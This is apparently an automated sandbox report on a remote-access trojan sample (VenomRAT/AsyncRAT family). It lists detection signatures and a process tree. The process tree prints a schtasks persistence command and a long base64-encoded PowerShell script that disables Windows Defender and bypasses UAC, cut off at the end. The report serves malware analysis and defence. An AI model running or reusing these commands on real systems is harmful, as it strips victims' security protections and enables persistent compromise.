Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Analysis ID:	1446514
MD5:	144f1b1c4b9cdad97d8dd1a3a89e7ea1
SHA1:	1a11d76a6ab646a0d699efa0e5fc71de6e5af92c
SHA256:	e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
Tags:	exeVenomRAT
Infos:

Detection

AsyncRAT, DcRat, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AsyncRAT

Yara detected BrowserPasswordDump

Yara detected DcRat

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary or sample is protected by dotNetProtector

Check if machine is in data center or colocation facility

Contains functionality to log keystrokes (.Net Source)

Disable UAC(promptonsecuredesktop)

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables UAC (registry)

Encrypted powershell cmdline option found

Found many strings related to Crypto-Wallets (likely being stolen)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Windows Service Tampering

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Uses whoami command line tool to query computer and username

Very long command line found

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Execution of Powershell with Base64

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe" MD5: 144F1B1C4B9CDAD97D8DD1A3A89E7EA1)

Client.exe (PID: 6152 cmdline: "C:\Users\user\AppData\Local\Temp\Client.exe" MD5: 7AC0ADF482250172280DEFEC7A7054DA)

cmd.exe (PID: 6404 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7244 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7252 cmdline: timeout 3 MD5: 100065E21CFBBDE57CBA2838921F84D6)

Loader.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Roaming\Loader.exe" MD5: 7AC0ADF482250172280DEFEC7A7054DA)

powershell.exe (PID: 8072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgA